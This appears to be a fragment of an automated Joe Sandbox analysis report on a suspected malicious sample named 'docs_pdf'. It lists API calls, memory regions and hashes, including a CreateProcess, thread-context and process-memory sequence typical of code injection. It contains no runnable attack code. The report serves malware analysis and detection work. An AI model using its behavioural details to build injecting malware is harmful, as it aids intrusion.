                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,000F35A1,SwapMouseButtons,00000004,?), ref: 000F35D4
                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,000F35A1,SwapMouseButtons,00000004,?,?,?,?,000F2754), ref: 000F35F5
                                                            • RegCloseKey.KERNELBASE(00000000,?,?,000F35A1,SwapMouseButtons,00000004,?,?,?,?,000F2754), ref: 000F3617
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: Control Panel\Mouse
                                                            • API String ID: 3677997916-824357125
                                                            • Opcode ID: d6364716fe0dd43820d1355d199de1513d0f41ceff7aacd9d25d5715cdef9faf
                                                            • Instruction ID: 459e25c82100d46f473d619df184f5ece386fa73e63f4ab2949d9c115f42aeb6
                                                            • Opcode Fuzzy Hash: d6364716fe0dd43820d1355d199de1513d0f41ceff7aacd9d25d5715cdef9faf
                                                            • Instruction Fuzzy Hash: DD11457561020CBFDF208F64DC84ABFBBB9EF04750F008469F909D7210E2719E81ABA0
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 036E1A5B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 036E1AF1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 036E1B13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106556596.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_36e0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                                            • Instruction ID: b38241c0d54a4b5d5b60fa8239eff89e8cdb981007a1234b63423f5d74b09994
                                                            • Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                                            • Instruction Fuzzy Hash: 5F622B30A15218DBEB24CFA4C850BDEB376EF58700F1091A9D10DEB390E77A9E85CB59
                                                            APIs
                                                              • Part of subcall function 000F5045: _fseek.LIBCMT ref: 000F505D
                                                              • Part of subcall function 001599BE: _wcscmp.LIBCMT ref: 00159AAE
                                                              • Part of subcall function 001599BE: _wcscmp.LIBCMT ref: 00159AC1
                                                            • _free.LIBCMT ref: 0015992C
                                                            • _free.LIBCMT ref: 00159933
                                                            • _free.LIBCMT ref: 0015999E
                                                              • Part of subcall function 00112F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00119C64), ref: 00112FA9
                                                              • Part of subcall function 00112F95: GetLastError.KERNEL32(00000000,?,00119C64), ref: 00112FBB
                                                            • _free.LIBCMT ref: 001599A6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                            • String ID:
                                                            • API String ID: 1552873950-0
                                                            • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                            • Instruction ID: 1239498643cd1294a10b4e9fd9b217f341b924fda2c32fa2722f4b082c24be6e
                                                            • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                            • Instruction Fuzzy Hash: 7F516FB1904218EFDF249F64DC45AEEBBB9EF48300F0004AEF619A7242DB715A94CF59
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                            • String ID:
                                                            • API String ID: 2782032738-0
                                                            • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                            • Instruction ID: 46e5136d76b5c2e746c91049621897395e2bc67085b573e6b243a8ccba87832c
                                                            • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                            • Instruction Fuzzy Hash: DB41D575A0070A9BDF2CCEA9D8809EF77A6EF84B64B25813DE856C7640E7719DC08B44
                                                            APIs
                                                            • _memset.LIBCMT ref: 0012EE62
                                                            • GetOpenFileNameW.COMDLG32(?), ref: 0012EEAC
                                                              • Part of subcall function 000F48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000F48A1,?,?,000F37C0,?), ref: 000F48CE
                                                              • Part of subcall function 001109D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001109F4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                            • String ID: X
                                                            • API String ID: 3777226403-3081909835
                                                            • Opcode ID: 39d656f926614fde0406b7dfa0402005f7656e97f71081f8ab4ab5a093746ce3
                                                            • Instruction ID: 35d717bddf8f4f6fbca5e450e7c9e4d9fa874b99ddb7f8f97856bb062b5f0aab
                                                            • Opcode Fuzzy Hash: 39d656f926614fde0406b7dfa0402005f7656e97f71081f8ab4ab5a093746ce3
                                                            • Instruction Fuzzy Hash: C221A171A0025C9BCB11DF94D845BEE7BF9AF49300F00405AE508AB242DBB8598A9BA1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock_memmove
                                                            • String ID: EA06
                                                            • API String ID: 1988441806-3962188686
                                                            • Opcode ID: 6494c8707094921fae0e527d91b04c183791a249fc9f712b9c292d1b956f346c
                                                            • Instruction ID: d9c2de71d0974e00c262d8cd58291e70182cf0400fca41c39fe051af4c16b335
                                                            • Opcode Fuzzy Hash: 6494c8707094921fae0e527d91b04c183791a249fc9f712b9c292d1b956f346c
                                                            • Instruction Fuzzy Hash: C801F971C04218BEDB28C6A8C856EEEBBFCDB15301F00459AF552D6181E675A608C760
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 00159B82
                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00159B99
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Temp$FileNamePath
                                                            • String ID: aut
                                                            • API String ID: 3285503233-3010740371
                                                            • Opcode ID: 0fa39ece6fd69cdceef5795b7287eda2e301e376367669e9c782694eed6bcdd4
                                                            • Instruction ID: 53c161c2b453f8c1ca5af4a3bd5fa9e4736282025b02a6929dbbfd3ebbcef934
                                                            • Opcode Fuzzy Hash: 0fa39ece6fd69cdceef5795b7287eda2e301e376367669e9c782694eed6bcdd4
                                                            • Instruction Fuzzy Hash: 26D05E7954030DABDB109B90DC0EFAB773CEB04700F0042A1BE58920A2EEB099D98B91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d47fd2037e050fe626cc134584c8a0b33d566af93e4d9009c14da603171ac311
                                                            • Instruction ID: 33c2167a388d4f44bba20b8aff9f92192e5aac880735452d4a81c7059cf22ea8
                                                            • Opcode Fuzzy Hash: d47fd2037e050fe626cc134584c8a0b33d566af93e4d9009c14da603171ac311
                                                            • Instruction Fuzzy Hash: C8F15A71A083059FC714DF28C880A6ABBE5FF88314F54892EF8999B352D771E955CF82
                                                            APIs
                                                            • __FF_MSGBANNER.LIBCMT ref: 00115963
                                                              • Part of subcall function 0011A3AB: __NMSG_WRITE.LIBCMT ref: 0011A3D2
                                                              • Part of subcall function 0011A3AB: __NMSG_WRITE.LIBCMT ref: 0011A3DC
                                                            • __NMSG_WRITE.LIBCMT ref: 0011596A
                                                              • Part of subcall function 0011A408: GetModuleFileNameW.KERNEL32(00000000,001B43BA,00000104,?,00000001,00000000), ref: 0011A49A
                                                              • Part of subcall function 0011A408: ___crtMessageBoxW.LIBCMT ref: 0011A548
                                                              • Part of subcall function 001132DF: ___crtCorExitProcess.LIBCMT ref: 001132E5
                                                              • Part of subcall function 001132DF: ExitProcess.KERNEL32 ref: 001132EE
                                                              • Part of subcall function 00118D68: __getptd_noexit.LIBCMT ref: 00118D68
                                                            • RtlAllocateHeap.NTDLL(00E80000,00000000,00000001,00000000,?,?,?,00111013,?), ref: 0011598F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                            • String ID:
                                                            • API String ID: 1372826849-0
                                                            • Opcode ID: 4794c0efe9da38a2aaaddfda4aa6eed4ccf52016944bce37866743fad613c87a
                                                            • Instruction ID: ee8e964ae8d2845e6aeaa6713369edc522bf30c8a2e455c736d59d3e49d3504c
                                                            • Opcode Fuzzy Hash: 4794c0efe9da38a2aaaddfda4aa6eed4ccf52016944bce37866743fad613c87a
                                                            • Instruction Fuzzy Hash: 6301D231201B29DFEB1D2B64EC42AEE724A9FA1B38F51413AF4009A281DB709DC18262
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,001597D2,?,?,?,?,?,00000004), ref: 00159B45
                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,001597D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00159B5B
                                                            • CloseHandle.KERNEL32(00000000,?,001597D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00159B62
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleTime
                                                            • String ID:
                                                            • API String ID: 3397143404-0
                                                            • Opcode ID: f6a93abb7ddaada1e389cfa716029187950fd814186e662b1c62c0d9ca2a15ec
                                                            • Instruction ID: 2fab6ff5e01edd1b8ae4540883b7d7caebf12c25197d263533dcc464c110d499
                                                            • Opcode Fuzzy Hash: f6a93abb7ddaada1e389cfa716029187950fd814186e662b1c62c0d9ca2a15ec
                                                            • Instruction Fuzzy Hash: E8E08632581214F7E7212B64EC09FCB7B68AB05761F104124FB28690E087B12592D798
                                                            APIs
                                                            • _free.LIBCMT ref: 00158FA5
                                                              • Part of subcall function 00112F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00119C64), ref: 00112FA9
                                                              • Part of subcall function 00112F95: GetLastError.KERNEL32(00000000,?,00119C64), ref: 00112FBB
                                                            • _free.LIBCMT ref: 00158FB6
                                                            • _free.LIBCMT ref: 00158FC8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                            • Instruction ID: c8d58b55bdd2926c0f6878dc76f1410aa55a5cce7ec62b1bf1430284773cfe0e
                                                            • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                            • Instruction Fuzzy Hash: 71E012A170D7028ADE28A578BD44AD357EE5F4C352B18082EF859EF142EF34EC968124
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CALL
                                                            • API String ID: 0-4196123274
                                                            • Opcode ID: 9b4290b02ddd0b13495aef1e3d6082ed4c42744bc98c44740bfd1f13077ea25d
                                                            • Instruction ID: 215d21edc82f21e3d536f96a6059156b7b64d2d7fbcd5addce7a26614c243e5f
                                                            • Opcode Fuzzy Hash: 9b4290b02ddd0b13495aef1e3d6082ed4c42744bc98c44740bfd1f13077ea25d
                                                            • Instruction Fuzzy Hash: E02249B0608205DFC724DF14C494B6ABBE1BF89300F15896DF98A8B762D731ED85DB82
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: EA06
                                                            • API String ID: 4104443479-3962188686
                                                            • Opcode ID: 188f2d6ade58a979bed24ff8831e52c4b82698ff43c126796e6d782148184cce
                                                            • Instruction ID: 33bdc62d2d0127d62331194d8bea45c87ae10c3a8cf9cba72e3dcf9f4a328364
                                                            • Opcode Fuzzy Hash: 188f2d6ade58a979bed24ff8831e52c4b82698ff43c126796e6d782148184cce
                                                            • Instruction Fuzzy Hash: 0C417C21A0415C6BDF219B64DC917FF7FA6AB05300F684074FF82ABA83C6618E44A3A1
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,000F5981,?,?,?,?), ref: 000F5E27
                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,000F5981,?,?,?,?), ref: 0012E19C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 011b23aec23b79ea96908a113987003611e02ecdc3cb3532ff1bf2ec853106c8
                                                            • Instruction ID: 2de154d232f2212806be47fe51f7424a321714321ddbe8af8951631107eb0bfd
                                                            • Opcode Fuzzy Hash: 011b23aec23b79ea96908a113987003611e02ecdc3cb3532ff1bf2ec853106c8
                                                            • Instruction Fuzzy Hash: A6019270244708BEF7685E24DC8AF763ADCAB01769F108328BBE55A5E0C6B01E959B50
                                                            APIs
                                                              • Part of subcall function 0011594C: __FF_MSGBANNER.LIBCMT ref: 00115963
                                                              • Part of subcall function 0011594C: __NMSG_WRITE.LIBCMT ref: 0011596A
                                                              • Part of subcall function 0011594C: RtlAllocateHeap.NTDLL(00E80000,00000000,00000001,00000000,?,?,?,00111013,?), ref: 0011598F
                                                            • std::exception::exception.LIBCMT ref: 0011102C
                                                            • __CxxThrowException@8.LIBCMT ref: 00111041
                                                              • Part of subcall function 001187DB: RaiseException.KERNEL32(?,?,?,001ABAF8,00000000,?,?,?,?,00111046,?,001ABAF8,?,00000001), ref: 00118830
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 3902256705-0
                                                            • Opcode ID: 8f0142fcf2ad61d82fd9bffa00e05d2ac03c94d179ad951e46275d7147eb8185
                                                            • Instruction ID: 874169f00e267624ed70d1b1424034f60c9cc1e9ee0195a8a64e96d747db5b1c
                                                            • Opcode Fuzzy Hash: 8f0142fcf2ad61d82fd9bffa00e05d2ac03c94d179ad951e46275d7147eb8185
                                                            • Instruction Fuzzy Hash: 9DF0F43590025DB6CB29BE98ED019DFBBE99F14350F204535F904A2181DFB18BC0C6E1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: __lock_file_memset
                                                            • String ID:
                                                            • API String ID: 26237723-0
                                                            • Opcode ID: 7d972b5e9374a8c79d9bc5020c60d3fef8d18bea398c23824c0e762d218d07c1
                                                            • Instruction ID: 9a639993686ff95061646cf5fc186802679a94da47046ebac4b362a34c0a8169
                                                            • Opcode Fuzzy Hash: 7d972b5e9374a8c79d9bc5020c60d3fef8d18bea398c23824c0e762d218d07c1
                                                            • Instruction Fuzzy Hash: 96018871800A05EBCF19AF6A8C015DE7B62AF91360F148235B8145A161DB3186A1DB91
                                                            APIs
                                                              • Part of subcall function 00118D68: __getptd_noexit.LIBCMT ref: 00118D68
                                                            • __lock_file.LIBCMT ref: 0011561B
                                                              • Part of subcall function 00116E4E: __lock.LIBCMT ref: 00116E71
                                                            • __fclose_nolock.LIBCMT ref: 00115626
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                            • String ID:
                                                            • API String ID: 2800547568-0
                                                            • Opcode ID: bbe6e048c9f433f60888c45f6518a53b8fc33ab407e49b4582b1480bf4f4d34c
                                                            • Instruction ID: 75e1afff900b1a926edf90bbbee637360259f6d2b4d65d7297b594f8d7209795
                                                            • Opcode Fuzzy Hash: bbe6e048c9f433f60888c45f6518a53b8fc33ab407e49b4582b1480bf4f4d34c
                                                            • Instruction Fuzzy Hash: 30F02B71804B00DAD72CAF7588027DE77E21F91334F658225A410AB0C1CF7C49C1CB95
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 036E1A5B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 036E1AF1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 036E1B13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106556596.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_36e0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                                            • Instruction ID: 8539764389f5d4a61a4a5351f473e67a59a50f345f0589cab5fbd89f292a27fb
                                                            • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                                            • Instruction Fuzzy Hash: 1612CD24E24658C6EB24DF64D8507DEB232EF68300F1090E9D10DEB7A5E77A4E85CF5A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fb5e1463641142d382c2d1adb152571fb06803d924798c3f18e03bed687c14ef
                                                            • Instruction ID: f44d9b528a67375c24616bfd83d05aa41f852920b1128c206707e1aea15c74a6
                                                            • Opcode Fuzzy Hash: fb5e1463641142d382c2d1adb152571fb06803d924798c3f18e03bed687c14ef
                                                            • Instruction Fuzzy Hash: B651A135600604AFCF18EB64CD96FBE77A6AF49314F158068FA46AB392CB70ED00DB51
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 0f93539bf87354248685b11ab5cef8e514fcd7301a448428a953d4023ae7aa7a
                                                            • Instruction ID: cba2000290b9dd593cf672292ba7a452ce04a890f52e65e355d2a877417a70f4
                                                            • Opcode Fuzzy Hash: 0f93539bf87354248685b11ab5cef8e514fcd7301a448428a953d4023ae7aa7a
                                                            • Instruction Fuzzy Hash: 3431A279608A06DFC728AF18D490975F7E0FF08310714C569EA8ECBB65E770D881DB86
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 000F5CF6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 18537ed2a82ae2ccc2f2f32811352c977c9c6b0577045eab70d7731457740a1a
                                                            • Instruction ID: c3488b5b51ff1f938d71e9471b3322269bf93ff5c38868bef9c7db5f20d0eb68
                                                            • Opcode Fuzzy Hash: 18537ed2a82ae2ccc2f2f32811352c977c9c6b0577045eab70d7731457740a1a
                                                            • Instruction Fuzzy Hash: C7314F71A00B19AFCB18DF2DC8846ADB7B5FF48311F148629DA1993B10D771B960EBD0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            APIs
